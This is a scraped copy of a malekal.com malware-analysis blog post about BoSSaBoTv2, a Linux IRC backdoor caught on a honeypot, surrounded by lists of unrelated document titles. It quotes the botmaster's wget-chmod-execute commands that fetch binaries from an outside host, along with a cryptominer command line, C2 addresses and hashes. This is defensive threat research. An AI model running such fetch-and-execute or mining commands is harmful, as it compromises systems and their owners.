BoSSaBoTv2 : another Linux Backdoor IRC malekal's site



Similar documents
Malware Trend Report, Q April May June

PTSv2 in pills: The Best First for Beginners who want to become Penetration Testers. Self-paced, online, flexible access

(General purpose) Program security. What does it mean for a pgm to be secure? Depends whom you ask. Takes a long time to break its security controls.

Overview. Common Internet Threats. Spear Phishing / Whaling. Phishing Sites. Virus: Pentagon Attack. Viruses & Worms

Mobile Malware Network View. Kevin McNamee : Alcatel-Lucent

Contact details For contacting ENISA or for general enquiries on information security awareness matters, please use the following details:

Security A to Z the most important terms

ENEE 757 CMSC 818V. Prof. Tudor Dumitraș Assistant Professor, ECE University of Maryland, College Park

Current Threat Scenario and Recent Attack Trends

About Botnet, and the influence that Botnet gives to broadband ISP

Security workshop Protection against botnets. Belnet Aris Adamantiadis Brussels 18 th April 2013

Multifaceted Approach to Understanding the Botnet Phenomenon

Additional details >>> HERE <<<

Networks and Security Lab. Network Forensics

Security+ Guide to Network Security Fundamentals, Third Edition. Chapter 2 Systems Threats and Risks

Network Incident Report

The HoneyNet Project Scan Of The Month Scan 27

Automating Linux Malware Analysis Using Limon Sandbox Monnappa K A monnappa22@gmail.com

An analysis of exploitation behaviors on the web and the role of web hosting providers in detecting them

CIT 480: Securing Computer Systems. Malware

Spyware: Securing gateway and endpoint against data theft

Certified Cyber Security Expert V Web Application Development

Windows Malware Annual Report 2014 And prognosis 2015

Integrated Approach to Network Security. Lee Klarich Senior Vice President, Product Management March 2013

Innovations in Network Security

Additional details >>> HERE <<<

Codes of Connection for Devices Connected to Newcastle University ICT Network

Spyware. Michael Glenn Technology Management 2004 Qwest Communications International Inc.

COMPUTER-INTERNET SECURITY. How am I vulnerable?

BOTNETS. Douwe Leguit, Manager Knowledge Center GOVCERT.NL

Tutorial on Smartphone Security

Tool & Asset Manager 2.0. User's guide 2015

Indian Computer Emergency Response Team (CERT-In) Annual Report (2010)

What's the difference between spyware and a virus? What is Scareware?

Top Ten Cyber Threats

Course Content: Session 1. Ethics & Hacking

Attacks from the Inside

Firewalls and Software Updates

Summer Training Program CCSE V3.0 Certified Cyber Security Expert Version 3.0

Web Application Worms & Browser Insecurity

WEB ATTACKS AND COUNTERMEASURES

Symantec enterprise security. Symantec Internet Security Threat Report April An important note about these statistics.

Audit de sécurité avec Backtrack 5

isheriff CLOUD SECURITY

Security Engineering Part III Network Security. Intruders, Malware, Firewalls, and IDSs

MALWARE THREATS AND TRENDS. Chris Blow, Director Dustin Hutchison, Director

CSE 3482 Introduction to Computer Security. Denial of Service (DoS) Attacks

Malicious Network Traffic Analysis

Ten Tips to Avoid Viruses and Spyware

Storm Worm & Botnet Analysis

Computer Security DD2395

Stopping zombies, botnets and other - and web-borne threats

Course Content Summary ITN 261 Network Attacks, Computer Crime and Hacking (4 Credits)

Seminar Computer Security

Threat Events: Software Attacks (cont.)

BUILDING A SECURITY OPERATION CENTER (SOC) ACI-BIT Vancouver, BC. Los Angeles World Airports

Advanced Persistent Threats

Radware Security Research. Reverse Engineering a Sophisticated DDoS Attack Bot. Author: Zeev Ravid

Threats and Attacks. Modifications by Prof. Dong Xuan and Adam C. Champion. Principles of Information Security, 5th Edition 1

Botnets. Botnets and Spam. Joining the IRC Channel. Command and Control. Tadayoshi Kohno

How to easily clean an infected computer (Malware Removal Guide)

Malware. Björn Victor 1 Feb [Based on Stallings&Brown]

A Critical Investigation of Botnet

OS Security. Malware (Part 2) & Intrusion Detection and Prevention. Radboud University Nijmegen, The Netherlands. Winter 2015/2016

Introduction au BIM. ESEB Seyssinet-Pariset Economie de la construction contact@eseb.fr

Information Security Threat Trends

Malware Analysis Quiz 6

Understanding Computer Viruses: What They Can Do, Why People Write Them and How to Defend Against Them

Top tips for improved network security

ZNetLive Malware Monitoring

F-Secure Anti-Virus for Mac. User's Guide

Spyware. Summary. Overview of Spyware. Who Is Spying?

This page is left blank on purpose.

Lessons learned: Sinkholing the Zeroaccess botnet. Ross Gibb. Attack Investigations Team Symantec Security Response.

Operation Liberpy : Keyloggers and information theft in Latin America

How To Understand The History Of The Web (Web)

Host-based Intrusion Prevention System (HIPS)

6. ecommerce Security and Payment Systems. Alexander Nikov. Teaching Objectives. Video: Online Banking, Is It Secure?

Ethical Hacking Course Layout

Microsoft Security Response Center (MSRC) Microsoft Malware Protection Center (MMPC)

Transcription:

Projet antimalwares Comparatif Antivirus Soutenir Malekal.com Forum Me contacter malekal's site site entraide informatique Rechercher... Rechercher Articles/Papiers Projet antimalwares Comparatif Antivirus Soutenir Malekal.com Forum Me contacter Flux RSS Global Internet Backbone he.net/ip_transit/ IPv6+IPv4 Transit For Your Network New Special 10 Gbps $4000/month Menu Accueil News Malwares / Informatique / Internet [en] BoSSaBoTv2 : another Linux Backdoor IRC Par 1 of 14 09/13/2014 06:07 PM

Publicité?> GNU/Linux Basique Général Réseau Windows General Malwares Sécurité Windows Tutoriaux Logiciels News du site / Vrac 12 Share 2 Tweet 41 Share 2 Share 70 Today, i was looking at my web honeypot and this one pay my attention : http://www.malekal.com/modsec/index.php?ip=178.32.59.202 The PHP vulnerability is very used (already wrote something about it : http://www.malekal.com/2014/03/31/backdoor-perl-shellbot-b-et-backdoor-linuxtsunami-a/ ) but it was the first time i saw thoses base64decode code. The code lead to haxmeup.uni.me (192.95.12.34 OVH) that redirect to http://www.bilder-upload.eu/thumb/41130a-1408995611.jpg I expect to get a PHP-Shellbot as usual, but this time, it was a FUD binary : https://www.virustotal.com/fr/file /bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9/anal /1409041374/ so i launch it : Rejoignez-nous sur Facebook 2 of 14 09/13/2014 06:07 PM

Top menaces Pos. 1. PUPs 2. Adware 3. Trojan 4. Worm Menaces MySearchDial - Trovi - istart.webssearches.com - istartsurf Sweet Page - System SpeedUp - Mega Browser - ViewPassword - Ads by Keep now Antivirus Security Pro - ZeroAccess / Sirefef Virus USB Raccourcis Plus de procédures de désinfection Partenaires Autoblog Malekal botnets.fr geekden Le blog de Chantal11 Liste Malwares malekal.com PjJoint Malekal.com S!RI Blog made a connection to 37.59.74.161 (OVH again) port 8067, there is an ircd behind nmap -sv 37.59.74.161 -p 8067 Starting Nmap 6.00 ( http://nmap.org ) at 2014-08-26 10:47 CEST Nmap scan report for 37.59.74.161 Host is up (0.027s latency). PORT STATE SERVICE VERSION 8067/tcp open irc Unreal ircd Service Info: Host: irc.wix.wix Service detection performed. Please report any incorrect results at http://nmap.org/submit/. 3 of 14 09/13/2014 06:07 PM

BoSSaBoTv2 : another Linux Backdoor IRC malekal's site This website uses cookies OKAY Tigzy Roguekiller Xylibox Blog MORE INFO so an IRC Backdoor. Publicités Network Bandwidth Monitor solarwinds.com... See Which Users, Apps & Protocols Are Consuming Bandwidth- Learn More Google Chromecast for $35 google.com/chr... Enjoy online video & anything from the web on your TV. buy now! Another surprise, the ircd doesnt have any mod to hide users etc. ~40 bots, not so much. So let s play. Mots clefs adware adwares Antispywares Antivir antivirus Avast! backdoor botnet CD Live désinfection Eorezo 4 of 14 exploit Firefox on the screenshot bellow, we can that the bostmaster launch a range IP scan, then some bots Exploit some servers. We can see that the exploit at 200.185.236.85 was successfull because it joins the channel as a new bot. 09/13/2014 06:07 PM

BoSSaBoTv2 : another Linux Backdoor IRC malekal's site This website uses cookies OKAY MORE INFO Malwares PUP ransomware rogues rootkit réseau scareware spam rogue spyware spywares Stealer TDSS trojan trojans tutorial vers virus Trojan.Winlock Windows worms Tuto4PC zbot ZeroAccess confrimed by my VM. We got an other DNS con32.cz.cc that give the same IP 192.95.12.34 Publicités Two new bots : 5 of 14 09/13/2014 06:07 PM

BoSSaBoTv2 : another Linux Backdoor IRC malekal's site This website uses cookies OKAY MORE INFO You need Flash player 8+ and JavaScript enabled to view this video. Publicités The IRCd is new around ~40 bots in 9 days : The botmaster made regularly download new binary all from www.bilder-upload (seems legitim)!boss*!boss*!boss*!boss* SH SH SH SH wget http://www.bilder-upload.eu/thumb/05fbc4-1409059856.jpg -P /tmp mv /tmp/05fbc4-1409059856.jpg /tmp/4l2njg5vab chmod 777 /tmp/4l2njg5vab /tmp/4l2njg5vab Some Hashs and Hosts recap : haxmeup.uni.me / con32.cz.cc / con64.cz.cc (192.95.12.34 OVH) haxmedown.cz.cc 37.59.74.161 http://malwaredb.malekal.com/index.php?hash=35c950db3dc60b55e623ec591f8d7f33 http://malwaredb.malekal.com/index.php?hash=7f8cc390f7b3e53f2921f0debae09902 http://malwaredb.malekal.com/index.php?hash=dfb0291c04d6593103e6ac7a8954f19e 6 of 14 09/13/2014 06:07 PM

then i wrote a little script to send the email abuse, hope, they will lose some bots MalwareMustDie decompile the binary, some strings : http://pjjoint.malekal.com /files.php?read=20140826_n7h14d5w5i6 Thanks to them. Bitcoin capabilities : 000000007BC0 000000007C20 000000007C60 /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null & pkill minerd ; pkill m32 ; pkill m64 wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x8 7 of 14 09/13/2014 06:07 PM

The most interresting : 000000007E1D BoSSaBoTv2-%s a search at Google this topic on http://www.hackforums.net /showthread.php?tid=4395309 According the date post, the kit is new and the price is at 100$ 8 of 14 09/13/2014 06:07 PM

BoSSaBoTv2 : another Linux Backdoor IRC malekal's site This website uses cookies 9 of 14 OKAY MORE INFO 09/13/2014 06:07 PM

Back, lot of attacks this WE : http://www.malekal.com/modsec/index.php?ip=213.73.31.13 http://www.malekal.com/modsec/index.php?ip=195.154.140.251 http://www.malekal.com/modsec/index.php?ip=5.135.64.105 http://www.malekal.com/modsec/index.php?ip=46.105.230.91 http://www.malekal.com/modsec/index.php?ip=128.233.173.167 Binaries are undetected http://malwaredb.malekal.com /index.php?hash=5453043042be4ad21259bcb9b17e9bd3 http://malwaredb.malekal.com /index.php?hash=36263d91d726dcdb93b97ea05ae8656a IRCd : 23.95.10.101 port 53 10 of 14 09/13/2014 06:07 PM

40 2 You may also like: 11 of 14 09/13/2014 06:07 PM

Trojan.Chepvil et Trojan.Sasfis / Trojan.Cridex : les campagnes de Spam malicieux continuent SPAM/Virus Facebook : gagner un iphone 4S color SpamHaus ransomwa Win32/Stration.worm. Worm.Win32.Warezov Tutorial Dial-a-fix Supprimer Adware.Zango Supprimer /Email- 12 Share 2 Tweet 41 Share 2 Share 70 12 of 14 09/13/2014 06:07 PM

2 Comments 1. 2. myturbopc.com Remove all Malware in 2 mins. #1 Download for 2014. Rated 5/5! sneezing_panda Posté le 8 septembre 2014 à 4:28 He s an idiot. http://puu.sh/bqoya/ebec4b2878.png People are already compl on the HF thread. CyD Posté le 8 septembre 2014 à 10:52 Using botnets of zombie computers to spread malicious code through vulnerabilities in order to perform cyber-based attacks like denial-of-service i big mistake. Please, report this kind of cybercrime activities to federal law enforcement. Keep up the good work. Laisser un commentaire Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont ind avec * Nom * E-Mail * 13 of 14 09/13/2014 06:07 PM

sert à rien d'exposer vos problèmes ici, allez sur le forum pour obtenir de l'aide : http://forum.malekal.com Commentaire Vous pouvez utiliser ces balises et attributs HTML : <a href="" title=""> <abbr title=" <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite= <strike> <strong> Laisser un commentaire Plan du site À propos du thème Arras Ce site est hébergé par la société OVH 14 of 14 09/13/2014 06:07 PM

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information